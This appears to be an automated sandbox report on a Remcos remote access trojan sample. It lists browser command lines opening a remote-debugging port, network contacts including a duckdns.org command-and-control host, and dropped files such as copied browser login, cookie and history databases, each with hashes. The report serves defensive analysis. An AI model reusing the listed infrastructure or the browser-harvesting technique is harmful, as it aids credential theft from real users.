C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2076,16346737594269585079,20237595710529944,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2076,16346737594269585079,20237595710529944,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5460 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.206:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 172.217.16.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 206.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 225.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
GB 142.250.187.206:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
GB 142.250.187.227:80 o.pki.goog tcp
GB 172.217.16.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 ris4sts8yan0i.duckdns.org udp
DE 194.163.145.131:23458 ris4sts8yan0i.duckdns.org tcp
DE 194.163.145.131:23458 ris4sts8yan0i.duckdns.org tcp
DE 194.163.145.131:23458 ris4sts8yan0i.duckdns.org tcp
DE 194.163.145.131:23458 ris4sts8yan0i.duckdns.org tcp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp
US 8.8.8.8:53 131.145.163.194.in-addr.arpa udp
US 8.8.8.8:53 50.33.237.178.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.180.4:443 www.google.com tcp
GB 142.250.180.4:443 www.google.com udp
US 8.8.8.8:53 3.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 202.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 4.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
US 8.8.8.8:53 apis.google.com udp
GB 142.250.179.234:443 ogads-pa.googleapis.com tcp
GB 216.58.201.110:443 apis.google.com tcp
GB 142.250.179.234:443 ogads-pa.googleapis.com udp
US 8.8.8.8:53 234.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.14:443 play.google.com tcp
US 8.8.8.8:53 14.200.250.142.in-addr.arpa udp
N/A 127.0.0.1:9222 tcp
N/A 127.0.0.1:9222 tcp
N/A 127.0.0.1:9222 tcp
N/A 127.0.0.1:9222 tcp
N/A 127.0.0.1:9222 tcp
N/A 224.0.0.251:5353 udp
N/A 127.0.0.1:9222 tcp
US 8.8.8.8:53 94.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp

Files

memory/1396-4-0x00007FFFFD7D3000-0x00007FFFFD7D5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1uzeupjm.z0o.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1396-14-0x0000023AEF4B0000-0x0000023AEF4D2000-memory.dmp

memory/1396-15-0x00007FFFFD7D0000-0x00007FFFFE291000-memory.dmp

memory/1396-16-0x00007FFFFD7D0000-0x00007FFFFE291000-memory.dmp

memory/1396-19-0x00007FFFFD7D3000-0x00007FFFFD7D5000-memory.dmp

memory/1396-20-0x00007FFFFD7D0000-0x00007FFFFE291000-memory.dmp

memory/1396-23-0x00007FFFFD7D0000-0x00007FFFFE291000-memory.dmp

memory/3824-24-0x0000000002D80000-0x0000000002DB6000-memory.dmp

memory/3824-25-0x0000000005B60000-0x0000000006188000-memory.dmp

memory/3824-26-0x0000000005800000-0x0000000005822000-memory.dmp

memory/3824-27-0x00000000058A0000-0x0000000005906000-memory.dmp

memory/3824-28-0x0000000005910000-0x0000000005976000-memory.dmp

memory/3824-38-0x0000000006190000-0x00000000064E4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 806286a9ea8981d782ba5872780e6a4c
SHA1 99fe6f0c1098145a7b60fda68af7e10880f145da
SHA256 cd2c977928e78b2d39bba8a726308f17b2946ea3f1a432de209720f691450713
SHA512 362df97f9fc9c2f546538814cd0402a364a286326219f03325f8cbd59d33f9d850c26daf42230f0bb4feb7e5134868a51e7a3d2f5bc136fe3de69d5d82c5ae2e

memory/3824-40-0x00000000066B0000-0x00000000066CE000-memory.dmp

memory/3824-41-0x0000000006700000-0x000000000674C000-memory.dmp

memory/3824-42-0x0000000007EE0000-0x000000000855A000-memory.dmp

memory/3824-43-0x0000000006C60000-0x0000000006C7A000-memory.dmp

memory/3824-44-0x0000000007920000-0x00000000079B6000-memory.dmp

memory/3824-45-0x00000000078C0000-0x00000000078E2000-memory.dmp

memory/3824-46-0x0000000008B10000-0x00000000090B4000-memory.dmp

C:\Users\Admin\AppData\Roaming\Trosbekendelsers.Kas

MD5 905bf07c78adec592c65bb262ef5bb1d
SHA1 9fe8a12f9ce994588f71ce8422a49c6ca635aca7
SHA256 e6855f03526c0c656d47efadbeef1f164e07c326ebe391d163d27cb34daf60e6
SHA512 5e378deb88ac640c03cfd345d4ce45dac29ec16d9220d7e23fda44cffed94786892be35c403808024be24d280c8c7539348b5be9d6ea54ef6d530027c385508b

memory/3824-48-0x00000000090C0000-0x000000000D3AA000-memory.dmp

memory/5080-62-0x00000000012B0000-0x0000000002504000-memory.dmp

memory/5080-65-0x00000000012B0000-0x0000000002504000-memory.dmp

memory/5080-71-0x0000000022600000-0x0000000022634000-memory.dmp

memory/5080-70-0x0000000022600000-0x0000000022634000-memory.dmp

memory/5080-67-0x0000000022600000-0x0000000022634000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State

MD5 933cbc0df8dc76402552a6e4ec1a7fd8
SHA1 79a84d9a293b63cf6a3cd9163cb648739739134e
SHA256 6b768a171de6acfb57119b36d2bcede557072e7ef39813dafa2fc0592f3c1770
SHA512 76baacceeede27beff3ae21f55e7bef3243314b3a73414a7d6fce5c4b73f0aedfcc358944992289de34ae578d0fedb950f415e09607832b9ae2fb0c75655a563

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

MD5 dde4555bdf5ade5a50e4e213061aec8e
SHA1 fea52c1ac82b0822021551dd87ca5b671b0dcc3b
SHA256 d3afee736c6e6461df00a7f00e1489e9bc9c0d944b3457a49c952dc0bc72ce2f
SHA512 2fda7e265ce18b052efa3046374aa0c2cd45ffc632ba1534ded402dffcbbc2fd9aacebc5954e7845b286127e550f0745c18d303506ca40e9a1e02c791b22daa8

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\Cookies

MD5 9c779c49ff65c63a0e1f21ca2b9e7b32
SHA1 05a41de94dac2f32fc5c70ee6930f7bfe957f1a3
SHA256 f273806682e0f096b695794cb7ebae7954676a01ce8f886a50bdc2911629109e
SHA512 37274b46e9559a328b3549f550cc6b729c593a7ef032ad6744d6dc673359b3fe239e1b9f85e6b580f81720e726f5ae30378cfaff259c4c58b674213a4da4599b

\??\pipe\crashpad_4772_WKUBBGVAKPKDWBTM

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_1

MD5 d0d388f3865d0523e451d6ba0be34cc4
SHA1 8571c6a52aacc2747c048e3419e5657b74612995
SHA256 902f30c1fb0597d0734bc34b979ec5d131f8f39a4b71b338083821216ec8d61b
SHA512 376011d00de659eb6082a74e862cfac97a9bb508e0b740761505142e2d24ec1c30aa61efbc1c0dd08ff0f34734444de7f77dd90a6ca42b48a4c7fad5f0bddd17

C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

memory/4352-193-0x0000000000400000-0x0000000000478000-memory.dmp

memory/2432-194-0x0000000000400000-0x0000000000462000-memory.dmp

memory/3300-198-0x0000000000400000-0x0000000000424000-memory.dmp

memory/3300-202-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2432-201-0x0000000000400000-0x0000000000462000-memory.dmp

memory/3300-200-0x0000000000400000-0x0000000000424000-memory.dmp

memory/4352-203-0x0000000000400000-0x0000000000478000-memory.dmp

memory/4352-197-0x0000000000400000-0x0000000000478000-memory.dmp

memory/4352-196-0x0000000000400000-0x0000000000478000-memory.dmp

memory/2432-199-0x0000000000400000-0x0000000000462000-memory.dmp

memory/5080-215-0x0000000023120000-0x0000000023139000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\qjemytcxlbskfdcm

MD5 57509a6a6267f17bef5e5da8b1df8829
SHA1 0886741be12c4e6dd24688df7b9568e91b2fc2aa
SHA256 4d50e4b2ee7b25d6a88dea6a28503975ca95f98e6e72fcd1ee754d016df3ed3d
SHA512 019c20a2354ef20ff3870ea4d544ae4e7ec21729bfbeb19d2dd2f8b087fcb6b83f259ab2f35e0f3c7f044ebb7c5bbfdfc63f23b811d458a15f5ad35aa9175228

memory/5080-218-0x0000000023120000-0x0000000023139000-memory.dmp

memory/5080-219-0x0000000023120000-0x0000000023139000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

MD5 96a9fc805452d3237243fce3bde70d04
SHA1 c271b02ff78f5faf85c8f45d3f14d380b342a893
SHA256 fdda4550f69f2c7e6ce384826ac850e6b8822eaab852fe2e019904c00dcf3a79
SHA512 cd837825f8d9aa504fe234f846d05e7a42cb83fee33fbd5a9ea39d9b7be00c9a9b3e9e8c5d6bdc8218995bbcf7ad92e2d1dab0e5807bb0ba1a25f567368b7c8e

memory/5080-235-0x00000000012B0000-0x0000000002504000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\throttle_store.dat

MD5 9e4e94633b73f4a7680240a0ffd6cd2c
SHA1 e68e02453ce22736169a56fdb59043d33668368f
SHA256 41c91a9c93d76295746a149dce7ebb3b9ee2cb551d84365fff108e59a61cc304
SHA512 193011a756b2368956c71a9a3ae8bc9537d99f52218f124b2e64545eeb5227861d372639052b74d0dd956cb33ca72a9107e069f1ef332b9645044849d14af337

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

MD5 a4fb0302a02a3ecc32edb23cf71bd5fd
SHA1 3daf5774259215b15aea4cf8bab0fed8a10bbb13
SHA256 fb1a2e251c5256e2a403a5cb694aa1e48c17fe923a56a8371bc4646fa205a9dd
SHA512 a82a06f49a3c20cc55ccc480854627ca6ba34234e6746383c633aa3b18321c8485b09cbc3bc5614a393a4a14774d4d6d1b272cd583365b4b8787d034edbbee89

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State

MD5 384b7779c79d854f284750a44f4f2121
SHA1 81ac29e105f39d4a9328798c3bba18099694be0a
SHA256 e1637a1d92d9072e5b1c1a9bcd1550583cbb5059d23fc4b1039329a307b042e1
SHA512 1ca8bbb8bb34600bc91c593fb409185971dfeb3f85f5dc52ea2ff39180dec179dcaa243ababc4c68f759b4b82ab780a4eded2775491a8a852946aa2be8a85a50

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

MD5 236557eb06e1a854a0d869fda6f96a7e
SHA1 d67caddf2259ae696567811de1bd428b01105499
SHA256 c8f5c9b47442a8058ac7f46b46a49793c372dcb1614ae3cfe359593dcf74f378
SHA512 ea52c1afae119d22b8528aab6ef397b0e1d06c6d0e66d69382b53b4a70d74a9af5ac1c509a9837f476be3942721e5035bfa18c6872e37c9646e9ab5a14fa863d

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

MD5 e3d9b9088eed4e4aa81e8188f50e44de
SHA1 a31bb3d265b5b82747ed302ba9ec8d392f78f5fa
SHA256 42f4942a6ea75451e5b4d2cb8cf75187be66d540ae519eba5bf2dee370b8cd51
SHA512 0c96b6b1f6203b37f36a6960aeb64ff0e00c87eac6e4dd2619617940acf9b0e468df09dbbaa06d9a8ae7f61494b8afdb3a4960ab50ba32a65a55711c85099f5c

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\000003.log

MD5 90881c9c26f29fca29815a08ba858544
SHA1 06fee974987b91d82c2839a4bb12991fa99e1bdd
SHA256 a2ca52e34b6138624ac2dd20349cde28482143b837db40a7f0fbda023077c26a
SHA512 15f7f8197b4fc46c4c5c2570fb1f6dd73cb125f9ee53dfa67f5a0d944543c5347bdab5cce95e91dd6c948c9023e23c7f9d76cff990e623178c92f8d49150a625

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\LOG

MD5 f7ada6b6555b1bb4976cf6b3da64d987
SHA1 bfd89f6ad95401ca83ea35a7ceb8eb8c5e94dc9b
SHA256 f81818afb82c3fb14ce6b428d47087508fb71156b4c30a2e2956b3666dffd0e8
SHA512 f0f07547bda1dab674808c8a811551af9f1c9f45d3541ee7b55c7faa27d63ef989f5ffd3b0535fbc56ead0ffaa6148916120df6bc6e49c7641c18ab14b165f16

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\GPUCache\index

MD5 875e9a85fcf65bfa7f07a00ccde1ced2
SHA1 045a1f77c07144a33202da7e9adda51667c0d3ae
SHA256 7e9834a4a34e43fb5857baafc8346242b9715328abc5369f8b50bcf608850363
SHA512 e27382cb1497628296545f026a3678799f1f715704b0ec552569aebafb8e4d8aab50d9710bb17d5b160a3a327f8289f335f0b3a03bc75ccfa48ec0c94e70c0e0

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

MD5 f3b327a1eb0b35fd676e7056c5ba9301
SHA1 f701ffa92853ced4018c7eef8732111548149d32
SHA256 db2b82901d3a191d3a51a34f7eed42268480f396a9193c4ac16ecc2d7579536d
SHA512 b8c364afdd1e9ea9238ae044c1dcc8fd3e561746f6145e960b4d35852cfddd86fd092a7928bdd9257c0d3c362f7c52f4e4c3fe3b655f7532a0d4c4fd83bb5119

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Top Sites

MD5 986962efd2be05909f2aaded39b753a6
SHA1 657924eda5b9473c70cc359d06b6ca731f6a1170
SHA256 d5dddbb1fbb6bbf2f59b9d8e4347a31b6915f3529713cd39c0e0096cea4c4889
SHA512 e2f086f59c154ea8a30ca4fa9768a9c2eb29c0dc2fe9a6ed688839853d90a190475a072b6f7435fc4a1b7bc361895086d3071967384a7c366ce77c6771b70308

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Favicons

MD5 b40e1be3d7543b6678720c3aeaf3dec3
SHA1 7758593d371b07423ba7cb84f99ebe3416624f56
SHA256 2db221a44885c046a4b116717721b688f9a026c4cae3a17cf61ba9bef3ad97f4
SHA512 fb0664c1c83043f7c41fd0f1cc0714d81ecd71a07041233fb16fefeb25a3e182a77ac8af9910eff81716b1cceee8a7ee84158a564143b0e0d99e00923106cc16

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Login Data

MD5 a182561a527f929489bf4b8f74f65cd7
SHA1 8cd6866594759711ea1836e86a5b7ca64ee8911f
SHA256 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA512 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\000003.log

MD5 148079685e25097536785f4536af014b
SHA1 c5ff5b1b69487a9dd4d244d11bbafa91708c1a41
SHA256 f096bc366a931fba656bdcd77b24af15a5f29fc53281a727c79f82c608ecfab8
SHA512 c2556034ea51abfbc172eb62ff11f5ac45c317f84f39d4b9e3ddbd0190da6ef7fa03fe63631b97ab806430442974a07f8e81b5f7dc52d9f2fcdc669adca8d91f

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Visited Links

MD5 bdf11bd95f44b5d53558f61bd27dca91
SHA1 5ceaa87d265b307ecc96e2052737aa3aeed9aa9e
SHA256 5acf0d0879a107b42d7e329003ca97ed0f84c28d64d478c82568ce85daf90593
SHA512 f42269ced13e90442ff3953012f45c11f17d223a128508312d34abc44095c0d955d0d15d8daeb829ed67b3380520f806e1e0e91361cfcda48f7892bb81b8cdf3

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\LOG

MD5 2016b878116d20e5bb473707ecd5c077
SHA1 81d90d3aa1a9240650ab2a9cf9f7c19b4915f9bb
SHA256 2bf3b664c1389860050cadfd259191a9520a8f143ce6714e46d2280901ee59ef
SHA512 f26b5b8293dc9eaa3e9391b0d2a7a5f45a537f6769f1f2af7297dfcf4ac8c8e837700e16c465ea74d92967f201d833257f73282a3e872ec68c776ec6a07b9a8a

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\js\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\History

MD5 d30bfa66491904286f1907f46212dd72
SHA1 9f56e96a6da2294512897ea2ea76953a70012564
SHA256 25bee9c6613b6a2190272775a33471a3280bd9246c386b72d872dc6d6dd90907
SHA512 44115f5aaf16bd3c8767bfb5610eba1986369f2e91d887d20a9631807c58843434519a12c9fd23af38c6adfed4dbf8122258279109968b37174a001320839237

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\LOG

MD5 a39100d58f767e0441d2b2dea04aa6a9
SHA1 7bc277bd5296401f853fe6f5a98720fe51e0d4b8
SHA256 fbe64c2e8c8defe59a161cd49948b44c9464795d8f19dc182ff0c3739ad897ba
SHA512 d3718c51ff4bd21c47d6ee76a85ae514cb3f067d7ca9adc908d079142a2165837f1eac2cc3d1d431253fe8d3b40740a3ad603c7451e897eb192441a9cc8c2431

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Web Data

MD5 0f20eb82bf9d6197efcb5cea9a014fa7
SHA1 2de5fb6b1a9d81984b7fd5ef7d446678f46e2159
SHA256 09a8a74b12f3f9fffbef4090cbd5d3f023d7eb4120cd33f5da05b697c7d5f9f2
SHA512 96bfe2ffcfb331d2649f177ffc2fdba6a5b587e9186b312304333a097d2ef5c317c6153631b72bdbeb610d12f7dde427c43aa8112b6599aebf7880d177d2758d

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences

MD5 b48ed78fa1fb941b515f74b52fb1dca4
SHA1 6833d24d0a079eee124987150f719abb72989744
SHA256 335d3428a522b9cd6fbedc14d9664bba5b6ce573eb5d1d86e2023a22e3d72546
SHA512 845118738800dfd8449863a903f8f94927fb5c6a6cfc45e5d08ef32f62136a2df4ea6a784a2e9f95147189678b5775034234d52f6f38247a9ac371726d531c12

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Last Version

MD5 838a7b32aefb618130392bc7d006aa2e
SHA1 5159e0f18c9e68f0e75e2239875aa994847b8290
SHA256 ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa
SHA512 9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\js\index-dir\the-real-index

MD5 d6a4310a22b226d06c413e85db21144f
SHA1 609328f69836f195a92cc898c441b762ac09abdb
SHA256 233c02e1ec765ed46698bfec2d4d659d8370234a32a71d4c5c767555639e90e0
SHA512 435c3f8318f07237a0fea126a20d8f00e4b7ab1df6e82e32a7b0858d126944f727ce5531474c9a767d22d0a5700b45adec63afa48b7b5a50c8eb4c78db6a6e0a

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\000003.log

MD5 9082ba76dad3cf4f527b8bb631ef4bb2
SHA1 4ab9c4a48c186b029d5f8ad4c3f53985499c21b0
SHA256 bff851dedf8fc3ce1f59e7bcd3a39f9e23944bc7e85592a94131e20fd9902ddd
SHA512 621e39d497dece3f3ddf280e23d4d42e4be8518e723ecb82b48f8d315fc8a0b780abe6c7051c512d7959a1f1def3b10b5ed229d1a296443a584de6329275eb40

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\LOG

MD5 4a4c9e4f78c46565a37e284a7fc140e0
SHA1 342ccdd35a3b53034b30d18d5ddf2c1973b13e3f
SHA256 927b3d7122b39700db8328b1aaeb1afe169daf5b8e88e9b28f301866c3b51db0
SHA512 2fda107038805818a47625ea8575c8d0bbc340f37d91567462d1be0e2b6a451f1b9506f0d4b919266ddac2794ccdbc5f2a537cfd8d84df22af9f70810d10273d

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\000003.log

MD5 9b7775348b1a20c738f2d414fe063028
SHA1 7caca46bd49028a547833d75884e0acad9be28ef
SHA256 f35dd4eda36525b8ee21685a7abf7aa3e56860e599a7b6e96e58198fca2f969b
SHA512 f0d1736b6e948b259154d34c0bb87912219975e84f24481f6deb4dad197e98eb12d630c8001b5f9ee3042831c25446311525e9ad906ae7a94de0d1f9b6fbcc2b

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences

MD5 cde5b0ac8d61b536faed1e2acec2c1de
SHA1 293f182f61e49ab0877b463b07c7b053113c14d0
SHA256 c4348083a6df5b6be6eda9a598405bc746ebaca7f81b06e27931cd4b8828c3ff
SHA512 4e5ab684482c2f677f9ff4c0734a050a67b645b707e3345999f82e1d7e9825e1c868adc8fbfc616e8ef2d62371f8909000bf2e674d8b17655b44afe3f14f748a

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\LOG

MD5 a685d72b5535fd10b3654cf5f449ca2a
SHA1 2291ee7e82188abde3b0e5ba0b448dfe1fd43807
SHA256 09b17e897bc640c4239a365f9ecc542d95b0105f3cb6f930d1519766aa73e019
SHA512 f972ebd69e0eea416702bee2d3a3cbcdb1803f7423ca27ac839f132bbb3d9c3e26fa3ec19cff6dbfa3f5234e2bd88bf2b15e198b14806da374b72d4ceb498b27

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\000003.log

MD5 2a8d1a9a677ec0f5d6fa05daeb6263b4
SHA1 abfe46d16e06ddac267bce691d9d84ef2dfe3d21
SHA256 6224793c056bede5a8cc6dbad7271807f0eb27ca64afb040458bf4e6d765caf6
SHA512 eddddd47e01f8d20583f11a37b548660faebd6827ed7220da01922604ffcc83a62cb661fa38a6a4f33aaa62461243be3d7ea068538bed70308b8b33f63a6eb2b

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\LOG

MD5 0f8924cae5959ee7da901e3661f4e052
SHA1 3576019bc8d10bcd30718f1b4e03960bff0ac894
SHA256 4726f9c57bc20e11e2921a2b9e0dbd05481a8e5eddf3d17e90380dba953d6521
SHA512 af5123a1dd7d49fb64d8500c0f18db3d5f9d94f65ffe9444109fc5a3ca829be01ad785feb887171f52fb1f39f552d31b486fdb08cf5a80eb2845681574ce05ec

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\000003.log

MD5 69449520fd9c139c534e2970342c6bd8
SHA1 230fe369a09def748f8cc23ad70fd19ed8d1b885
SHA256 3f2e9648dfdb2ddb8e9d607e8802fef05afa447e17733dd3fd6d933e7ca49277
SHA512 ea34c39aea13b281a6067de20ad0cda84135e70c97db3cdd59e25e6536b19f7781e5fc0ca4a11c3618d43fc3bd3fbc120dd5c1c47821a248b8ad351f9f4e6367

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\LOG

MD5 28980d262e7b790e6c5a7a2a15b739e5
SHA1 2ae7c031243862842309a5637441416c7a49c5bf
SHA256 53674a3a6dc530f9f232655af77a60280cd952eaea8864917c99f19a5acc2fb9
SHA512 8713604d0f1962d8b1a453768031cd3bd9e31a72866aefc69690dddf34d1aa2a4667d7410ae77248e90792604836d5f3634e221b0d73412570d0a3ed49cd8c27

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Microsoft Edge.lnk

MD5 422e196d341bdc34c9bf568864a8105f
SHA1 a66094f83dd74c64bc84a2d24728fa62835e6881
SHA256 9657d58866f1827c633f056e084bc176540a868c77c5507beb64a4ee06489446
SHA512 0544dec7433c9d15e81859d4c246fb871a355f96480c33ee9fc8ee4dd32bd189cd1fcfae695dd7fa18b7552cd63c17185461dc5afa2b3f86db32cc898c184d6a

memory/5080-360-0x00000000012B0000-0x0000000002504000-memory.dmp

C:\ProgramData\remcos\logs.dat

MD5 fc79aadb0a48d61a5d567e2cad727634
SHA1 2a2cfaa8b13191cd51a7f8177831f19bb457c35f
